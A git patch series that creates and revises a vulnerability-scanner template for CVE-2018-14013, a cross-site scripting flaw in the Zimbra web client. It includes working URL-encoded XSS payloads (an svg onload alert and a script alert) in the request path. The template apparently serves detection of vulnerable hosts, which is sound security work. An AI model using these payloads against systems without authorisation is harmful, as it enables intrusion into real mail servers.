From 317a63ec9c2602c0a07c69bf980c3e4b767eb0b3 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 27 Jul 2021 14:34:36 +0700 Subject: [PATCH 1/2] Create CVE-2018-14013.yaml --- cves/2018/CVE-2018-14013.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2018/CVE-2018-14013.yaml diff --git a/cves/2018/CVE-2018-14013.yaml b/cves/2018/CVE-2018-14013.yaml new file mode 100644 index 0000000000..e7c1f61f6e --- /dev/null +++ b/cves/2018/CVE-2018-14013.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-14013 + +info: + name: Zimbra XSS. + author: pikpikcu + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013 + tags: cve,cve2018,xss,zimbra + +requests: + - method: GET + path: + - "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html From c4acd6230719008f4637a0287ceaccb8fa229a5c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 3 Aug 2021 13:13:57 +0530 Subject: [PATCH 2/2] Update CVE-2018-14013.yaml --- cves/2018/CVE-2018-14013.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2018/CVE-2018-14013.yaml b/cves/2018/CVE-2018-14013.yaml index e7c1f61f6e..6c5d601a6f 100644 --- a/cves/2018/CVE-2018-14013.yaml +++ b/cves/2018/CVE-2018-14013.yaml @@ -1,22 +1,23 @@ id: CVE-2018-14013 info: - name: Zimbra XSS. + name: Zimbra XSS author: pikpikcu severity: medium + description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013 tags: cve,cve2018,xss,zimbra requests: - method: GET path: - - "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E" + - "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: status